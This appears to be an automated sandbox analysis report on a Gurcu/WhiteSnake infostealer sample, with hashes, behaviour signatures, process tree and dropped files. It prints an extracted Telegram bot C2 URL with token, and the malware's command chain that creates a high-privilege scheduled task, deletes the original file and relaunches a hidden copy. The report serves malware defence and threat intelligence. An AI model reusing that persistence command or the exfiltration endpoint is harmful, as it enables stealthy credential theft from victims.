Analysis

  • max time kernel
    91s
  • max time network
    161s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    14-10-2023 04:09

General

  • Target

    f21559ac7c67d871d4f05.exe

  • Size

    327KB

  • MD5

    78fd6df30f791c7b5f45dca0b4c952a5

  • SHA1

    d977ca82da0850eb5d4e69c9c657d1a41fb9c44d

  • SHA256

    dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129

  • SHA512

    abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d

  • SSDEEP

    6144:Vc6sWfGY/yODx332tOIXlU1QWZxXAnuHW9bbGDwVdqe1mM:Ps+CXIAuGG8dA

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot5968091729:AAHVag_ncx5c5AIYERGTqv9kr7clJT1_HDU/sendMessage?chat_id=-1001962300376

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe
    "C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2080
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "f21559ac7c67d871d4f05" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\f21559ac7c67d871d4f05.exe" &&START "" "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2624
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:2724
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:2604
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "f21559ac7c67d871d4f05" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:2652
        • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          "C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Modifies system certificate store
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:2488
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2488 -s 3100
            4⤵
              PID:2212
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {3A5EA470-934A-4095-82C7-60EC043A16E5} S-1-5-21-607259312-1573743425-2763420908-1000:NGTQGRML\Admin:Interactive:[1]
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2552
        • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1512

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        4867ad93cf4266c8d2e60dc572126d9b

        SHA1

        927eccfd9ce0c4928cef07d562fe150aaf5a9a2d

        SHA256

        bada32ebe861eb43985035b1f0ae299df93413601371d107b0c9f5e7b73961e5

        SHA512

        c3620a41ecd93ae814b771b085413cbb65faa3a630517f14cd43f4c859071e25a404d2666e6dd061dcdfe41fabb5701e836b492ceec9e0de1822d881a49e6a6b

      • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe

        Filesize

        327KB

        MD5

        78fd6df30f791c7b5f45dca0b4c952a5

        SHA1

        d977ca82da0850eb5d4e69c9c657d1a41fb9c44d

        SHA256

        dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129

        SHA512

        abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d

      • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe

        Filesize

        327KB

        MD5

        78fd6df30f791c7b5f45dca0b4c952a5

        SHA1

        d977ca82da0850eb5d4e69c9c657d1a41fb9c44d

        SHA256

        dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129

        SHA512

        abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d

      • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe

        Filesize

        327KB

        MD5

        78fd6df30f791c7b5f45dca0b4c952a5

        SHA1

        d977ca82da0850eb5d4e69c9c657d1a41fb9c44d

        SHA256

        dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129

        SHA512

        abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d

      • C:\Users\Admin\AppData\Local\Nvidia\f21559ac7c67d871d4f05.exe

        Filesize

        327KB

        MD5

        78fd6df30f791c7b5f45dca0b4c952a5

        SHA1

        d977ca82da0850eb5d4e69c9c657d1a41fb9c44d

        SHA256

        dba8f020ac6d09728422932492657fea3f0a95754cd279f5a949b6982bd32129

        SHA512

        abf0efb2412c522fbb7f6725a548e8d6a8bc045801a4dd8652a544a1527b99647140ad4843c41a6b00a728a5d8361c7e2ea80eba8ee3b291238729277dad228d

      • C:\Users\Admin\AppData\Local\Temp\CabD443.tmp

        Filesize

        61KB

        MD5

        f3441b8572aae8801c04f3060b550443

        SHA1

        4ef0a35436125d6821831ef36c28ffaf196cda15

        SHA256

        6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

        SHA512

        5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

      • C:\Users\Admin\AppData\Local\Temp\TarD475.tmp

        Filesize

        163KB

        MD5

        9441737383d21192400eca82fda910ec

        SHA1

        725e0d606a4fc9ba44aa8ffde65bed15e65367e4

        SHA256

        bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

        SHA512

        7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

      • C:\Users\Admin\AppData\Local\z1jp774dks\port.dat

        Filesize

        4B

        MD5

        da4902cb0bc38210839714ebdcf0efc3

        SHA1

        3820eccabc46f2c4f038c662d6542e8a9bd0de20

        SHA256

        86af1a4e860588062524f76e3014a080ff3a2b45b9111a7a2125cb7bdb092695

        SHA512

        ad22e09fbca35d8d7e551a21b5a55c077db086e45591a378ef4eae4af95dc8ca28bd99f6202e62de22834ca8e03d31a62de279f91489888847ce94238dfee35d

      • memory/1512-84-0x000007FEF4CE0000-0x000007FEF56CC000-memory.dmp

        Filesize

        9.9MB

      • memory/1512-85-0x000000001B4B0000-0x000000001B530000-memory.dmp

        Filesize

        512KB

      • memory/2080-5-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp

        Filesize

        9.9MB

      • memory/2080-0-0x0000000000DD0000-0x0000000000E28000-memory.dmp

        Filesize

        352KB

      • memory/2080-2-0x000000001B200000-0x000000001B280000-memory.dmp

        Filesize

        512KB

      • memory/2080-1-0x000007FEF56D0000-0x000007FEF60BC000-memory.dmp

        Filesize

        9.9MB

      • memory/2488-80-0x000007FEF4CE0000-0x000007FEF56CC000-memory.dmp

        Filesize

        9.9MB

      • memory/2488-81-0x000000001AD30000-0x000000001ADB0000-memory.dmp

        Filesize

        512KB

      • memory/2488-11-0x000000001AD30000-0x000000001ADB0000-memory.dmp

        Filesize

        512KB

      • memory/2488-10-0x000007FEF4CE0000-0x000007FEF56CC000-memory.dmp

        Filesize

        9.9MB

      • memory/2488-9-0x0000000000C50000-0x0000000000CA8000-memory.dmp

        Filesize

        352KB

      • memory/2552-15-0x000007FEF4CE0000-0x000007FEF56CC000-memory.dmp

        Filesize

        9.9MB

      • memory/2552-14-0x000007FEF4CE0000-0x000007FEF56CC000-memory.dmp

        Filesize

        9.9MB